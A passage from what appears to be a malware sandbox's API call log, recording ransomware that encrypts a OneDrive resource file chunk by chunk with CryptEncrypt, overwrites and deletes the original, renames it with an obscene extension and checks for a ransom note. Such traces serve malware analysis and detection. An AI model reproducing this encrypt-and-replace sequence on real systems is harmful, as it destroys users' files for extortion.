lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.110] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.111] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.111] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.111] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.111] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.111] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.112] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.113] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.113] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.113] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.113] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.113] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.114] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.114] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.115] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.115] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.115] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.115] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.115] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.116] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.116] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.116] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.116] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.116] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.117] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.117] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x350, lpOverlapped=0x0) returned 1 [0276.117] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x350, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x360) returned 1 [0276.117] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x360, lpOverlapped=0x0) returned 1 [0276.117] CloseHandle (hObject=0x5d3c) returned 1 [0276.117] CloseHandle (hObject=0x5d48) returned 1 [0276.117] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.123] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.124] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.126] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.127] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.127] CryptDestroyKey (hKey=0x2fb1c8) returned 1 [0276.127] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0276.127] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.127] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.128] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gl\\readme_back_files.htm")) returned 0xffffffff [0276.128] AreFileApisANSI () returned 1 [0276.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.128] CreateFileW 